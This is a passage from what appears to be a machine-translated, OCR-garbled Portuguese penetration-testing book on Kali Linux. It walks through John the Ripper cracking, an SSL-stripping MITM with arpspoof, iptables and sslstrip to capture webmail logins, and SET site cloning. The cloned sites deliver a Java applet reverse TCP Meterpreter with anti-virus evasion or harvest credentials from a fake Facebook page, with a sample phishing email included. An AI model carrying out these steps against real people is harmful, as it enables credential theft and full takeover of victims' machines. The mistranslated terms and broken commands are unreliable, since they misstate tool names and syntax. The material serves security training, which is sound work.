Para usar o John the Ripper em um arquivo de senhas, primeiro você precisa copiar o arquivo de 
destino 

ao Banheiro diretório. Emita o comando de cópia cp para mover o arquivo para a Banheiro 
diretório. Por exemplo, para copiar um arquivo shadow (um arquivo de senha comum encontrado 


em 
BIRS VRS dia ARGi9B A SAAREmo diretório que o John the Ripper, emita o comando banheiro 
eo nome do arquivo. Assim, para executar John the Ripper em um arquivo sombra, tipo john 
sombra. 

Você pode verificar o andamento de John the Ripper, premindo Enter, que irá mostrar 

a senha atual que está sendo imaginado, bem como as rachaduras por segundo listado como c/s. 


Você pode pausar John the Ripper, premindo CTRL e Cchaves juntas. Se você reiniciar 
John emitindo john IMAGEM, Ele vai continuar de onde parou a última vez que o arquivo. 


Para ver os resultados, uma vez João, os acabamentos do Estripador, tipo john-show IMAGEM. Então, 
para ver o 

resultados do arquivo de sombra, tipo john-show sombra. 

Você pode encontrar mais informações sobre John the Ripper, como outros comandos no 

http://www .openwall.com/. 


Man-in-the-middle 


Um ataque man-in-the-middle, por definição padrão é uma forma de escuta ativa 

por ter um atacante fazer conexões independentes com as vítimas. A maioria 

forma comum de ataques man-in-the-middle estão entre sistemas host. Não muito 

Há pouco tempo, uma vulnerabilidade foi encontrada que abusaram do sistema que move as pessoas 
a partir de 

inseguro para proteger páginas web. Isto dá atacantes a capacidade de espionar usuários 

conexão para proteger servidores web. A próxima seção irá cobrir essa vulnerabilidade. 

Os ataques comuns man-in-the-middle serão abordados nos próximos capítulos deste livro. 
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Tira SSL 


Em 2009, o pesquisador de segurança Moxie Marlinspike em DefCon lançado tira SSL. Ele 

introduziu o conceito de despojamento SSL, um ataque man-in-the-middle, em que um 

proxies HTTPS atacante rede solicita do usuário, em vez de enviar o tráfego 

através do protocolo HTTP, o qual pode ser interceptado e manipulado. Tira SSL automatiza o ataque 
e permite que alguém interceptar o tráfego destinado a um site seguro. O HTTP 

estrita especificação de segurança de transporte foi posteriormente desenvolvido para combater estes 
ataques, no entanto, a implantação de HSTS tem sido lento, e os ataques de decapagem SSL são 
ainda amplamente utilizado hoje. 


Para os fins desta seção, só estará usando uma única interface, no entanto, 
sua máquina virtual pode ser configurada com múltiplas interfaces Ethernet. Nós 
terá que verificar se há várias (virtuais) interfaces Ethernet habilitados. 


No canto superior esquerdo da área de trabalho, clique no Xterm link para abrir 
um terminal de comando. Uso ifconfig para determinar o que são interfaces no 
máquina virtual. 


O comando é ifconfig | grep "eth". Este comando irá filtrar-out todo o 
as interfaces diversas e apenas nos mostrar as interfaces Ethernet, conforme segue: 


grep “eth' 


Ethernet HwWaddr G0:Gc:29:49; 


Se tivermos mais de uma interface habilitada, emitir o comando ifdown com a 

interagir nome para desativá-lo. Por exemplo, existem interfaces nomeada etho e eth1, 
emitir o comando Ifdown ethO para desativar o eth0 interface. Você vai desativar seu 
interface não-ativo. 


'~# ifdaw ethd 
Intemet Systems Consortium DHCP Client 4.2.2 
Copyright 26 
ALL rights 
or info, 


stening « PF/eth@/b0:6 
Sending on LPF /eth/ 
Sending on 
DHCPRELEASE an ethd ta 


ta Loading /etc/samba/smb.conf: smbd only. 
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A fim de executar o man-in-the-middle (MITM) ataque tira SSL, você precisa de dois 

peças de informação. Em primeiro lugar, é necessário o endereço IP do alvo. Em segundo lugar, 
você 

necessário o endereço IP do roteador que atua como gateway de sub-rede. Uma vez que este 
ataque 

método só é eficaz a partir da mesma camada 2 segmentos como o alvo, iremos 

preciso verificar o nosso próprio gateway padrão. Para fazer isso, vamos precisar de utilizar 


o terminal de comando, uma vez mais. . 
Em sua edição sessão de terminal o seguinte comando: 


route-n 


Ou o comando filtrada shell route-n | grep 'UG' | awk 'fprint $ 2}' vontade 
retornar apenas o gateway padrão. 


:-# route -n | awk ‘{print $2}' 
IP 
Gateway 
190.0.1.2 
0.0.0.0 


#1 


Iniciando o ataque - redirecionamento 


Antes que possamos começar a coletar informações, tais como as credenciais do usuário de sessões 
SSL, 

precisamos obter algumas tarefas realizadas. Precisamos começar as instalações que nos permitem 
para redirecionar o tráfego da rede. Além disso, precisamos redirecionar o tráfego capturado por 
nosso 

atacando hospedeiro para que possamos encaminhar os pacotes de usuários para tira SSL. Para 
fazer isso, nós 

precisa habilitar o encaminhamento de IP em Iptables e Arpspoof. 
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As próximas três etapas irá configurar o encaminhamento de IP, redirecionamento 
arpspoof, 

e configurar o redirecionamento de porta. Estes comandos são todos executados a partir 
de 


terminal de digna geo mande. Habilitando IP Forwarding: 


:~# echo 1 > / 


Para os fins deste exemplo, vamos precisar de saber o IP do / host alvo vítima 

endereço. Isso é para evitar contendas e ARP endereço inundações a toda a rede 

por todos os exércitos de ataque. Em um cenário de ataque real, ela pode ser ideal para executar 
arpspoof 

contra todo o segmento da camada 2 (este é o padrão, se IP da vítima é omitido) 

e / ou utilizar o pacote de captura e cheirar, a fim de determinar a vítima IP. 

Em um ambiente com muitos hosts isso pode fazer com que o fluxo de tráfego para diminuir e 
pôr em causa a capacidade do atacante de permanecer despercebido. O comando é: 


arpspoof-i eth0-t victimip default gateway ip 


root@kali: ~ 
sch 


- ar -i ethO -t 10.0.1.240 10.0.1.1§ 


Recomenda-se que você não enviar esse processo para o fundo e deixar 
a janela para cima. Basta começar uma nova sessão de terminal. 


Configurando o redirecionamento de porta usando o 


katqoles que o atacante para pegar o trafego destinado a um servidor HTTP sobre TCP 80 e 
redirecionar para a porta de escuta tira SSL. Neste exemplo, o redireccionamento sera em TCP 
10000 tanto para destino porta e redirecionar destino. O atacante pode usar qualquer 

valor aplicável. O destino redirecionamento escolhido também deve ser utilizado para a criação 
a porta de escuta para tira SSL. O comando é a seguinte: 


iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT 
-Aos portos 10000 - 
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:—-% iptables -t nat -A PREROUTING -p tcp --destination-port 80 
ECT --to-ports 10000 


# | | 


regras usar. 


iptables-t nat-F # para lavar 
iptables-t nat-L # para verificar 


arpspoof tem muitas opções. Você pode usar o comando man iptables 
ver opções adicionais. 


Para desativar o PREROUTING regra, substitua o -A com -D para limpar toda a tabela 
| a4 
Agora vocé deve ser definido e pronto para iniciar a captura usando SSL tira! 


Lançamento sslstrip e da janela de linha de comando recém-inaugurado, execute o 
comando a seguir para iniciar o SSL tira escuta em 10000 TCP port: 


sslstrip-l 10000 


:-# sslstrip —l 10000 


sslstrip 0.9 by Moxie Marlinspike running... 


[125] 


Ataques do lado do servidor 


A partir do host de destino, procure um serviço de correio online, como 
https:/Awww hotmail.com e log in 


Micro peraat Anats tras? 


Cosy | ecceme your account? 
The entirely Sen in wih a wight che code 


met Pu eit r 


Usando o menu de atalho do aplicativo para o Ssistrip diretório, abra outra 
Terminal janela e digite o seguinte comando: 


Isso agora deve mostrar-lhe os resultados do SSL tira ataque. 
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Note-se que o nome de usuário e senha foram obscurecidas no 
exemplo a seguir, mas devem aparecer de forma clara e em sua tela. 


root@kalk ~ 


Resumo 


Este capitulo explica varios métodos de comprometer servidores web vulneraveis 

utilizando ferramentas disponiveis no Kali. Os métodos mais comuns estao identificando 
conhecido 

vulnerabilidades com ferramentas automatizadas e explorar o melhor caminho possivel para 
acesso ao sistema de destino. 


O capítulo começou com foco em várias ferramentas utilizadas para identificar vulnerabilidades. 

O próximo tema abordado foi ferramentas utilizadas para explorar vulnerabilidades encontradas em 
comum 

servidores, bem como os servidores que hospedam os serviços de e-mail. Em seguida, nós nos 
concentramos em bruto-forçando 

ferramentas que poderiam acessar dados de sistemas que não são vulneráveis a ataques 
conhecidos. 

Concluímos abordando quebra de senha e ataques man-in-the-middle; 


Fortim canes assune sesrentaioado SEROUS A expleiayspbagentallisiades encontradas 
em sistemas hospedeiros, também conhecidos como dispositivos de cliente. 
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O termo cliente ou host significa um ponto clien te para conectar a uma rede, tal como um 
computador, um tablet, ou um dispositivo móvel. Um cliente pode oferecer informações, serviços e 
aplicações para outros clientes ou obter informações de outro sistema, como um 

servidor. Normalmente, o cliente termo refere-se a terminais utilizados por pessoas. Ter pessoas 
envolvido abre um leque de possíveis vulnerabilidades. 


Ataques do lado do cliente, no que se refere a aplicações web, é visto como um método para 
identificar quem está ligando para aplicações web, o que vulnerabilidades existem naqueles 
sistemas, e se esses sistemas pode ser um meio para obter acesso ou informações 

a partir de uma aplicação web. O foco deste capítulo será a identificação de sistemas 
acesso a aplicações web, avaliação de sistemas de vulnerabilidades, e explorando 

essas vulnerabilidades, se possível. Este capítulo vai incidir fortemente sobre comprometer 
senhas, pois eles são os métodos mais comuns utilizados para proteger os sistemas de 
acolhimento. 


Este capítulo irá kick-off, cobrindo como atacar anfitriões usando engenharia social. 

Mais tarde, veremos como identificar vulnerabilidades em sistemas host para que você possa 
explorar essas vulnerabilidades usando ferramentas cobertas em outras seções deste livro. Nós 
concluirá com atacando senhas, porque eles são os meios mais comuns 

para proteger os sistemas host. 


A engenharia social 


Os seres humanos sempre serão seus elos mais fracos para a postura de segurança de um alvo. 
O 

mais você tenta controlar os usuários finais, mais eles vão tentar políticas de bypass. 

Quanto menos os controles que você colocou no lugar, a menos provável que as políticas serão 
seguidas. 

Isso cria uma espada de dois gumes ao decidir como proteger os usuários finais 

ameaças cibernéticas. Hackers sabem disso e direcionar os usuários finais de várias maneiras que 
se concentram 

em comprometer uma característica-chave do usuário médio, que é confiança. 


Ataques do lado do cliente 


A engenharia social é a arte de manipular as pessoas para a execução de ações de 
divulgação de informações. Muitos ataques do lado do cliente são baseadas em enganar um 
usuário final 

em expor seus sistemas para um ataque. A engenharia social pode variar de chamar 
alguém fingindo ser um funcionário autorizado a postar um link em 

Facebook que afirma ser um serviço, enquanto realmente ser um meio para comprometer 

o cliente. 


Melhores práticas para o lançamento de um bem-sucedido ataque de engenharia social é tomar o 
tempo 

para compreender o seu alvo; significado aprender como os usuários se comunicam e tentativa 

se misturar em seu ambiente. A maioria dos ataques de engenharia social que não tendem a ser 
escrito em um formato genérico, e eles não incluem um gancho forte para atrair a vítima, 

como um mal escrito e-mail dizendo que o usuário tem o direito de fundos não reclamados. 

O uso de fontes de mídia social como o Facebook é uma ótima maneira de aprender sobre um alvo, 
como o que passatempos e padrões de fala como alvo favor. Por exemplo, o desenvolvimento 
armadilhas com base em esportes bilhetes com desconto seria ideal se um perfil no Facebook de um 
alvo é coberta com os logotipos da equipe de esportes. 


Porque a maioria dos ataques do lado do cliente alavancar a engenharia social, a próxima seção 
irá 
explorar um popular arsenal engenharia social disponível em Kali. 


Engenharia Social Toolkit (SET) 


O Engenheiro social Toolkit (SET) foi criado e escrito pelo fundador da 

TrustedSec. É uma ferramenta orientada para Python open-source que visa Teste de Invasão 
usando engenharia social. SET é uma ferramenta extremamente popular usado por segurança 
profissionais para testar a postura de segurança de uma organização. Atacantes da vida real usar 
SET 

para criar ataques ativos e maliciosos. É a ferramenta de escolha para o mais comum 

ataques de engenharia social. 


Para iniciar o jogo, vá para o seguinte link da barra de menus Ferramentas de Exploração |Social 
Ferramentas de engenharia, e selecione se-toolkit. 


A primeira vez que você iniciar SET em Kali, SET exibirá as atualizações de distribuição SET 


directamente a partir de GitHub. Você será presenteado com a opção de receber atualizações 
automaticamente. Selecionar sim para receber atualizações automáticas. 
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SET irá pedir-lhe para verificar se git é instalado. Kali vem com git pré-carregado; 

no entanto, a melhor prática é seguindo os passos em Capítulo 1, Teste de Invasão e 
Instalação, atualizar Kali. Atualizações irá incluir uma versão do git necessário para começar a 
trabalhar. 


O Kali 1.0 não inclui o . Git diretório. Para atualizar, você deve seguir o 

os seguintes passos: 
1. Abra um terminal e navegue até cd / usr / share. 
2. Faça o backup do antigo conjunto diretório digitando mv definir Backup.Set. 
3. Re-Download SET do GitHub usando o seguinte comando: 


git clone https://github.com/trustedsec/social-engineer-toolkit/ 
set / 


4. Salvage o velho configuração arquivo para evitar ter que definir o caminho do MSF 


usando: 
cp Backup.Set / config / set config set / config / set config 
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5. Verifique que as obras definidas usando o comando se-kit de ferramentas. 


TARAR È ATTAC i 7 P e 3 E s 
IMPORTANT NOTICE! | 50C naince LK1T Nas Made some sig! 


hanges due to the ider s Jcture of Kali and FSH (Linux). 


in src/program ju 


Kali 


Usando SET para clonar e ataque 


Agora que vocé entende algumas das dinamicas basicas de como funciona a SET, vamos 
comprometer uma maquina cliente usando um site que pode confiar. Apesar de que podemos 
usar qualquer site, recomendamos algo que é simples. 


Aqui esta um exemplo de clonar um corporativa SharePoint local com a intengao de 

explorando a vitima por um carregamento meterpreter. Na realidade, pode ser qualquer site que vocé 
quer comprometer. Nós escolhemos um site do SharePoint, pois como um verificador da penetração 
você 

provavelmente vai querer usar um alvo que vai atingir o seu objetivo. Muitos atacantes para 
propósitos nefastos podem usar um site público para clonar. 


Foraol vour password: 
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O próximo passo é lançar SET, indo para Ferramentas de Exploração [Engenharia Social 
Toolkit |se-toolkit. 


Depois que você aceita todas as licenças e termos de serviços, você verá a tela principal 
para SET. 


The Social-Engineer Toolkit is a product of Trustedsec. 


Visit: https://wew.trustedsec. com 
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Recomenda-se selecionar o 5) Atualize o Toolkit social-Engenheiro opção anterior 

ao uso de SET. Uma vez atualizado, selecione a opção 1) Os ataques de engenharia social-. O 
imagem seguinte mostra os diferentes vetores de ataque website disponível sob Social- 
Ataques de engenharia em SET. A opção de spear phishing é uma oferta de ataque populares 
a capacidade de incorporar os ataques em e-mails e PDFs. O ataque de phishing lança envia 

o ataque arquivos através de um falso e-mail originada pela vítima diretamente da SET. 


4 - - 


The Social-Engineer Toolkit is a product of Trustedsec. 


visit: https://www. trustedsec.com 


Para este exemplo, vamos selecionar Vetores de Ataque Website, porque anteriormente 
clonado um site por um ataque baseado na Web site. Em seguida, precisamos determinar como 
entregar a carga. Existem várias opções disponíveis. Escolha o Java Applet 

Attack, que é normalmente opção 1. 
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Java Applet attack 


Metasploit Browser Exploit 


credential Harvester 


Tabvabb ting 


man Left in the middle attack 


web-Jacking Attack 


Mu lti-Attack 


SET vai perguntar se vocé gostaria de usar um modelo existente que vem com o SET, ou 
se você gostaria de clonar um site. Os modelos padrão não são boas, e é 
recomendado para clonar um site, como o exemplo do SharePoint fornecida anteriormente. 


Na próxima tela, SET vai apresentar várias opções de como o usuário pode copiar 
o site. Neste exemplo, usaremos a opção local-Cloner. Selecione local-Cloner, 
SET e irá fornecer uma série de perguntas. Estas questões irão orientá-lo através 
clonar um site e ter que correr de Kali. Site-Cloner irá solicitar o seguinte: 


e NAT/ Port Forwarding: Esta opção tende a confundir as pessoas. SET está pedindo 
se as vítimas irá se conectar a sua máquina usando o endereço IP configurado 
em seu servidor de Kali ou se as vítimas irá se conectar a um endereço IP diferente 
(Como um endereço NAT). Isso realmente entra em jogo quando você está atacando 
pessoas fora da sua rede ou na Internet. Selecionar sim se você está atacando 
vítimas fora da sua rede. Tipo não se você está atacando vítimas no 
mesma rede, tal como um laboratório interno. 
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* Endereço IP / nome de host para conexão reversa: Quando SET oferece sua carga 
a vítima, SET precisa dizer a vítima como ligar de volta para Kali. Numa 
ambiente de laboratório, você pode digitar o endereço IP do seu servidor de Kali. 


e URL que você deseja clonar: Este é o site que você está copiando. 


* Exploit para entregar: SET vai usar o Metasploit estrutura para proporcionar o 
explorar. A opção mais popular é o O Windows Reverse TCP Meterpreter. 
O do Windows Reverse TCP Meterpreter funciona por ter uma vítima executar um 
executável que estabelece uma porta aberta para um atacante para ligar de volta 
através de obter acesso shell completo para PC da vítima. A figura a seguir 
mostra as cargas disponíveis. Windows Reverse TCP Meterpreter é o 
segunda opção na lista. 


E va Você pode importar seu próprio executável. Esta é geralmente usada pelos 
> atacantes ou outras pessoas escrevendo suas próprias ferramentas / malwares. 


SET vai pedir para selecionar o tipo de técnica de ofuscação anti-vírus que você gostaria 

para usar. SET exibirá uma classificação ao lado de cada técnica. Selecione uma opção bem cotado, 
a menos que você deseja uma opção específica. A figura a seguir mostra o disponível 

opções. Nós vamos com opção 16, porque tem a melhor classificação. 
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SET vai perguntar qual a porta ouvinte deve ser usado. Na maioria dos casos, ficar com o padrão 
portos. Após a última pergunta é respondida, SET fará com que o site clonado. 


O novo sítio clonado pode ser usado como um meio para comprometer alvos. Você precisa 
para enganar os usuários para acessar o site clonado utilizando um navegador de Internet. O 
utilizador 

acessando o site clonado vai ter um Java pop-up, que se for executado, irá fornecer uma 
Reserve TCP Meterpreter ao seu servidor de Kali. O atacante pode iniciar um meterpreter 
sessão e ter privilégios de administrador completos no dispositivo acessando o site clonado. 
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A máquina cliente verá uma mensagem de Java pop-up simples, que parece normal e 
deve passar despercebida pelo usuário médio, como mostrado na imagem seguinte: 


Warning - Security ; 


The application's digital signature cannot be verified. 
Do you want to run the application? 


Login | Rame Trusted Jove Acplet (VERIFIED SFE) 


Publisher, Ubon 


From: hrgos//10.255.27. 309 


I~ Bhooya trust content Enn the pyikahar | 


Thi appacation wil run wth unrestricted access which may pat 
your personal information at risk, Rue ths sppécsfion only É you 
trust the pobierer 


No momento em que o usuário final executar o applet Java no site clonado, o Kali 
servidor irá conectar a máquina da vítima, como mostrado na imagem seguinte: 


o rmn 


eu... .... 4. 


| 


O exemplo a seguir é uma imagem mostrando que SET pode interagir com o meterpreter 
sessão e emitir comandos diretamente para a vítima: 
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handler 


Você pode ter várias sessões com o meterpreter. Neste exemplo, foi utilizado o 

comando sessões de | 1. Essencialmente, o que estamos fazendo está interagindo com o primeiro 
sessão do meterpreter. Se tivéssemos vários hosts comprometidos, poderíamos ter 

várias sessões Meterpreter, interagir com eles, alternar entre eles, ou perto 

los individualmente. 


Agora que já aprendeu alguns dos princípios básicos do uso de SET, vamos olhar para mais uma 
exemplo. Vamos olhar para a clonagem de um website para fins de roubo 
uma senha. 


Desta vez, quando chegamos às opções de ataque, vamos selecionar ataque harvester credencial. 
O ataque harvester credencial pode ser encontrado primeira seleção Engenharia Social 
Ataques, Vetores de Ataque Website, e, em seguida, Ataques Harvester credencial. 


The Web-Jacking Attack 


© Multi-Attack met 
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Você tem a opção de clonar um site, usando um modelo de site, ou importar 
seus próprios arquivos da Web (HTML, imagens e outros arquivos). 


Sites populares como Facebook, Gmail, Twitter e ter modelos. Entrando 

o URL do site pode clonar outros sites. Encontramos em alguns casos, tanto o site 

templates e clonagem de um site simplesmente não parece certo. Nesses casos, você deve usar 
uma importação personalizada. Você pode usar copiadora web ou software de clonagem web, o 
que temos 

já discutido, para salvar uma cópia de um site em sua caixa de Kali. Uma vez salvo, o uso 

a opção de importação personalizada para apontar para o diretório site copiado. Você vai precisar 
de 

experimentar para ver o que funciona melhor opção para o seu site particular. 


vill al T to import 
s that it can ilize within the 


1 method will 
utiliz 


pe web application 


Vamos escolher opção 2) Sitio Cloner. Nós sera solicitado a digitar uma URL. Iremos 
clone https://www.facebook.com. 


4 HTTPS ou URL HTTP. Na maioria dos casos, isso não fará nenhuma diferença 
Ne porque não vamos hospedar um site seguro, mas em alguns casos o HTTP 


Note-se que estamos entrando na URL exata e especificando se queremos que o 
site pode ser diferente do que o local de HTTPS. 


Também será solicitado a digitar o endereço IP que SET vai usar para hospedar o falso 

site. Muito provavelmente este será o endereço IP da sua caixa de Kali Linux. No entanto, se 
você está pensando em dirigir as vítimas para um endereço que está usando uma tradução NAT 
(Talvez através de um firewall upstream), digite o endereço NAT. 


SET começará esperando por conexões depois de ter clonado um site e 
configurada a porta de escuta, como mostrado na imagem seguinte: 
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O próximo passo é direcionar os usuários para o site falso. Uma maneira comum de fazer isso é 
enviando um e-mail falso também conhecido como phishing e-mail. SET pode automatizar isso para 
você, mas para este exemplo, nós decidimos fazê-lo manualmente. O próximo exemplo mostra um 
falso e-mail usando o nosso link Facebook clonado. Quando o usuário clica no link www. 
facebook.com, eles serão enviados para o nosso site falso em facebook.secmob.net. 


Facebook «mwi secmobEgmad com» 


Fnosbock Securty 
Dear Facebook user, 


in an effort to make you online experience safer and more enjoyable, Facebook will be 
mplementing a new login system that will affect all Facebook users. These changes will 
offer new features and increased account security 


Before you are able to use the new login system, you will be required to update your 
account. 


Please click on the link below to update your account online now 


Mites | facebook secre sety 


if you have any questions, reference out New User guide 


Thanks, 


The Facebook Team 


Facebook will never ask you for your password in an email or Facebook message. Learn 
more about how to keep your account secure, 
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Você pode ver na imagem seguinte página clonada parece com o Facebook, mas 
o URL não é realmente Facebook. O ataque assume a vítima não vai notar a 
ligeiramente diferente URL, que é por isso que ataques de phishing reais usar domínios 


semelhantes 
o site real. 


I] mesma to Facebock - tog im 
A wermoh net 


La. Movi Viilted + Catting Serret Time  Conet 


Connect with friends and the 
world around you on Facebook. 


See photos and updates | 


Share what's new in yr 


Find more 


Sign Up 


t's free and aiways will 


Birthday 
Month +| Day >) Yrar -j = 


Female Male 


Create à Page for a celeb: 


Quando a vítima entra em seu nome no site falso, SET irá redirecionar o usuário 
para o site real. Na maioria dos casos, os usuários poderão digitar sua senha uma segunda vez sobre 


o real 


local e ser registrado no site, sem nunca perceber que eles foram atacados. Na Kali 
Sistema Linux em execução SET, você pode ver que a senha é capturada. 
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Além do registo directo, SET irá gerar um relatório do incidente, de modo que o 
atacante pode aproveitar as credenciais roubadas em um momento posterior. 


Secllanf 


ii 
Fa 
| 

J 


Welcome to the Sociel-Engineer Toolkit Report Generation Tool, This report should contain information obtained during a 
successful phishing attack and provide you with the website and all of the parameters that were harvested. Please remember 
that SET is open-source, free, and avaitadie to the information security community. Use this tool for good, not evi 


Ao utilizar ferramentas como o SET para atacar clientes, é importante para um verificador da 
penetração 

para entender o comportamento dos clientes. Uma das maneiras mais eficientes de fazer isso é 
usando um servidor proxy para examinar e pedidos de interceptação da web. 


Em Capítulo 6, ataques na Web, vamos olhar para Proxies com muito mais detalhes, no entanto, 
ainda é importante para aprender a analisar a forma como o cliente se comporta ao usar web 
ataques como o uso de SET como parágrafo anterior descrito. 


MitM Proxy 


MITM Proxy é uma grande ferramenta para um verificador da penetração para examinar o cliente 
vulnerabilidades. Ele permite que o administrador para examinar a conexão HTTPS, parada, 
examinar e responder tráfego. MITM Proxy permite que um administrador para alterar o pedido 
ou resposta de um servidor web. 


MITM Proxy pode permitir que um verificador da penetração para examinar os ataques de forma 
rápida e 

ver o que solicitações e respostas são provenientes de navegador web. MITM Proxy 

pode ser lançado, indo para Barrilha |Sniffing / Spoofing |Sniffers Web e 

selecionando mitmproxy. 
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bem como quando se analisa o comportamento de ataque. Você deve executar SET 


A É recomendado usar MITM Proxy quando a criação de um ataque SET, como 

r'a 

E 
SS a e Proxy MITM ao mesmo tempo em um ambiente de teste. 


Uma vez procuração MitM é carregado, você tera que apontar o navegador do seu cliente para o 
seu servidor de Kali. MITM exibirá as transações que ocorrem no solicitações da Web 
do lado do cliente, como mostrado na imagem seguinte: 


https: //github.com/ 
- 200 text/html 5.52kB 
(/a248,e. akamai .net/assets.github,com/stylesheets/bundles/github2-24759e3dedi1f2a 
fã e 7308872bdBdSSOctbRã.css 
O text/css 28.27kB 
com/images/modules/header / Logov7@4x-hover . png?! 


https: //a248,.e.akamai.net/assets.github.com/javascripts/bundles/ jquery-b2ca07cb3c906cec 
cfd5881 1b430b8bc25245926.js 
application/x-javascript 32.59k8 
httos://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-cb56 
afiae26Sd7ebab59c4e78b92cb.css 
200 text/css 37.09kB 
://a248,e,akamai.,net/assets.github.com/images/modules/home/ logos/facebook.png?1324 


5. 55k8 


Havera um registro de todas as atividades do navegador passando por cliente. Embora MITM 

Proxy não é utilizado como um componente activo num teste típico de penetração da web, que é um 
ótima ferramenta para usar quando configurar e testar SET antes de usar o pacote em um ao vivo 
ambiente. Nos próximos capítulos, vamos examinar outros tipos de proxies, no entanto, o 

razão gostamos MitM Proxy é porque é uma maneira fácil como verificador da penetração você pode 
ferramentas de ataque de ensaio por tê-los conectados diretamente em sua caixa de Kali Linux. 


Hospedar 


gaga acesso a sistemas de host é de identificar e explorar 
vulrtérabilidades no sistema operacional, os aplicativos instalados, e outros programas. 
Ferramentas como Nessus são métodos para avaliar os sistemas de conhecido automatizado 
vulnerabilidades. Esta seção irá cobrir a forma de instalar e executar o Nessus contra um alvo 
sistema. Ferramentas Exploração abordados Capítulo 3, os ataques do lado do servidor, pode ser 
usado para 

tirar vantagem das vulnerabilidades identificadas pelo Nessus. 
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Hospedar digitalização com Nessus 


O Nessus não vêm pré-instalados com Kali. Você vai precisar de obter registro 

código de Defensável usar Nessus. Defensável dá uma opção de alimentação de casa, mas é limitada 
para a digitalização de 16 endereços IP. Se você gostaria de digitalizar mais IPs, você deve comprar 
um 

ração profissional de sustentável. 


Instalando o Nessus em Kali 


Nessus HomeFeed está disponível apenas para uso pessoal e não comercial. Se você vai 
usar o Nessus no seu local de trabalho, você deve comprar Nessus ProfessionalFeed. 
Para obter um código de ativação para ir para o Nessus http://www .tenable.com/products/ 
nessus / nessus-HomeFeed. 


O Nessus não vem pré-carregado com Kali e terá de ser instalado. Você irá 
precisa baixar e instalar o Nessus. Não há uma versão específica para Kali Linux, 
mas a versão Debian 6.0 funciona bem. 


1. Baixe Nessus para o Debian. Ir para o site http://www .tenable.com/ 
products / nessus / select-seu-sistema operacional baixar Nessus 
para o Debian 64 bits. 


__ Note-se que quando você baixar o Nessus, você pode copiá-lo para o / Tmp 
«4 diretório. Se você introduzir estes comandos a partir de outro diretório, você 
Qe sera necessario ajustar os comandos. 


2. Va para o diretório onde você baixou o Nessus e emitir o 
os seguintes comandos: 
ar vx Nessus-5.2.1-debian6 * 
tar-xzvf data.tar.gz 
tar-xzvf control.tar.gz 
ar vx Nessus-5.2.1-debian6 *, 


tar-xzvf data.tar.gz 


tar-xzvf control.tar.gz 


Haverá agora uma etc diretório e uma optar diretório. 
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3. Copie o nessus diretório / Tmp / opt / ao / Opt diretório, fazer o / 
optar diretório se ele não existir. Emita os seguintes comandos: 


mkdir / opt (Você pode obter um erro informando o diretório / opt existe 
no entanto, passar para o próximo comando). 


cp-rf / <installed folder> / opt / nessus / opt 


cp-rf / <installed folder> / etc / init.d / nessus * / etc / init.d 


4. Você pode excluir o conteúdo de download do Nessus / Tmp diretório. 
5. Para iniciar o Nessus, emita o seguinte comando: 


/ Etc / init.d / start nessusd 


6. Log para a interface de gerenciamento Nessus. Abra um navegador e navegue 
para https://127.0.0.1:8834. 


Usando o Nessus 


A primeira vez que vocé entrar no Nessus, vocé sera saudado com algumas mensagens de boas 
vindas, 

e um aviso SSL irá aparecer permitindo que você saiba que você esta se conectando a uma auto- 
assinado 

certificado. Depois de algumas telas iniciais de auto-explicativo, você será solicitado a digitar 

o código de ativação j altima j 


Welcome to Nessus” 5 
Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to penom 


e High-speed vadnerabilly discovery, to determine which hosts aee running which serices 

- Agem@ess auditing, to make sure no host on your network is missing security patches 

« Compliance checks, to verify and prove that every host on your network adheres to the security po&cy you 
defined 

e Scan schecduiing, to automatically rum scans at the frequency you select 

e And more 


During he next steps, we are going to creme an administrative accoun and register your scanner vh a Plugin Feed 
vièch we will dowmload. You wil need an Activation Code before you can use Nessus: if you do not have an Activatio 
Code already, please go to hip were pessus orgregister’ to get one now 
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Você também vai definir um nome de usuário e senha que será usada para gerenciar o Nessus 
aplicação. As imagens abaixo mostram a criação de uma conta e fornecer a 
código de ativação por e-mail por Tenable depois de registrar: 


| 
jMessus 


Initial Account Setup 


First, we need to create an acimin user for the scanner, This user wa have administrative control on the scanner, the 
acme bas the ability to create/delete users. stop ongoing scans. and change the scanner configuration. 


Login: | 


Password: | 


Contin Password | 
< Prev Next > 
Because te admin user car Change ihe scanner configuration, the admin has tre ability to execute commands or the 


remote host Therefore, It should be considered Urai the ado user has the same privileges as the voor (or 
administrator) user on the remote host 


gistration 


vulnerabilities is discovered and released into the public domain, Tenable's research staff 
gins") that enable Nessus to detect their presence. The plugins contain vulnerability 
m to test for the presence of the security issue, and a set of remediation actions. To use 
bscribe to a “Plugin Feed" to obtain an Activation Code, 


tivation Code 


Activation Code: | 
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Download inicial dos plugins pode levar algum tempo, portanto seja paciente. 


| 
Neve 
a 


Nessus is fetching the newest plugin set 


Please wait... 


e 
The Nessus server 5 now downloading the newest plugins from Tenabia which may tewe some time as we're testing for è lot of stu’? 


Then, the Nessus server will start processing the phagins, wich is CPU / disk intensive and, therefore, takes à iot of tme =— Dois is ali pert of the installation process 
Once the plugins are dawrioades and processed, subsequent startups will be much faster. 


Since this Operator i Lexing some Ume. here are some useful inks 


e Documentation: This pege sorteics all of the manuels that you'll need to get th @ moat cut cf Nessus end Rs features. 


Discussions Sones: Do you need some help or want to interact with the Nessus community? This wouid ba tha piane bo ço 
Nessus. video Tutoriais: Our YouTube chance! contains è lot of videos that wi i helo new Nessus users get sared, and experiences users to discover new 
features 
Support Por ta Manage your feed, epen suppert tickets and get samele | secur ty policies (aude fies) 
R ly posts about new features for a! cf cur products: Nessus, SecurityCenter, the Log Correistion Engine (LCE), and the Passive 
bend to use Nessus to scan à lerge network” Taxa a look ef Tenable SecurtyCenter to see how you could leverage multiple 
e 0 t and share the results with the rest of your team 
Tenable Podcast: Terable regularly holes æ podcast where we Siscues about major security events of the week 
e Taite: Yup, we re there too. 


Thacks again for installing Nessus, and fer your patience while the plugins are getting downloaded and processed. We hope youll enjoy Nessus 5's new features! 


your network! 


Uma vez que todas as atualizações foram baixadas e inicializado, você será apresentado 
com tela de login. Use o nome de usuário e senha que você definiu durante a 
instalação inicial. 


Sign In fo Continue 


ooking for fio older Flash intettace? 


tenable 


Para iniciar a digitalização, clique no Digitalização guia na faixa de opções superior e selecione New 
Scan. Você irá 

então ser solicitado a digitar os detalhes do alvo. Você também será solicitado a selecionar o que 
modelo que você gostaria de usar. Nessus tem alguns modelos integrados. Neste exemplo, 
estamos escolhendo digitalização em rede externa. 
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Sy £ Se o Digitalização guia não estiver disponível, você também pode selecionar 
